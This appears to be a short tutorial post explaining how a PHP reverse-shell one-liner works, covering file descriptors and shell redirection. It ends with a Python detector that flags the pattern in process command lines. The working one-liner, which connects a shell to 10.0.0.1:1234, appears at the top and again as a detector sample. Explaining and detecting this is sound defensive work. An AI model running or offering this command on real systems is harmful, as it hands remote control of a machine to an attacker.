The command is

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

What it does is spawn an interactive reverse shell.
I couldn't quite read the code, so it was worth taking the time to understand it.
-i interactive Force the shell to behave interactively.
File descriptors: the kernel uses file descriptors to access files. A file descriptor is a non-negative integer. When an existing file is opened or a new file is created, the kernel returns a file descriptor. The first three are fixed:
0 stdin
1 stdout
2 stderr
Control operators:
& && ( ) ; ;; | || <newline>
Redirection operators:
< > >| << >> <& >& <<- <>
[n]> file Redirect standard output (or n) to file.
[n]>| file Same, but override the -C option.
[n]>> file Append standard output (or n) to file.
[n]< file Redirect standard input (or n) from file.
[n1]<&n2 Duplicate standard input (or n1) from file descriptor n2.
[n]<&- Close standard input (or n).
[n1]>&n2 Duplicate standard output (or n1) to n2.
[n]>&- Close standard output (or n).
[n]<> file Open file for reading and writing on standard input (or n).
Background Commands -- &
If a command is terminated by the control operator ampersand (&), the
shell executes the command asynchronously -- that is, the shell does not
wait for the command to finish before executing the next command.
“&&” and “||” are AND-OR list operators.
Now it makes sense:
Create a socket connected to 10.0.0.1:1234; it gets file descriptor 3 (0, 1 and 2 are already taken by stdin, stdout and stderr).
Run /bin/sh -i to get an interactive shell.
<&3 redirects the shell's stdin from the socket, so whatever the remote side sends is read as commands.
>&3 2>&3 redirect stdout and stderr to the socket, so command output and errors go back over the same connection.
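From the defender's side, the same three ingredients (a fsockopen() call, a command-execution function, and redirection of a shell's streams onto a descriptor numbered 3 or higher) are what make this one-liner stand out in process command-line telemetry. The following is an added detection example, not code from the original post; the sample command lines are constructed, and the function and pattern names are my own.

```python
import re

# Constructed sample command lines, as a process-audit feed might record them.
# The first is the one-liner discussed above; the others are benign look-alikes.
SAMPLE_CMDLINES = [
    "php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "php -r '$f=fsockopen(\"smtp.example.test\",25);fwrite($f,\"EHLO x\\r\\n\");'",
    "sh -c 'tar czf backup.tgz /srv/www >/var/log/backup.log 2>&1'",
]

# fsockopen("host", port) -> capture host and port
FSOCKOPEN_RE = re.compile(r'fsockopen\(\s*["\']([^"\']+)["\']\s*,\s*(\d+)')
# PHP functions that hand a string to a shell or spawn a process
EXEC_RE = re.compile(r'\b(?:exec|shell_exec|system|passthru|popen|proc_open)\(')
# <&N, >&N, 2>&N ... -> capture the descriptor being duplicated from/to
REDIRECT_RE = re.compile(r'\d?[<>]&(\d+)')


def analyze(cmdline):
    """Return a finding dict if the command wires a shell to a socket fd, else None."""
    sock = FSOCKOPEN_RE.search(cmdline)
    if not sock or not EXEC_RE.search(cmdline):
        return None
    fds = {int(n) for n in REDIRECT_RE.findall(cmdline)}
    # 0-2 are stdin/stdout/stderr; a freshly opened socket lands on 3 or higher,
    # so only redirections onto those descriptors are interesting here.
    socket_fds = sorted(n for n in fds if n >= 3)
    if not socket_fds:
        return None
    return {
        "host": sock.group(1),
        "port": int(sock.group(2)),
        "fds": socket_fds,
        "interactive": " -i" in cmdline,   # sh -i: interactive shell requested
    }


def scan(cmdlines):
    """Run analyze() over a list of command lines and collect the findings."""
    return [f for f in (analyze(c) for c in cmdlines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print("reverse-shell pattern:", finding)
```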
Know it, then hack it.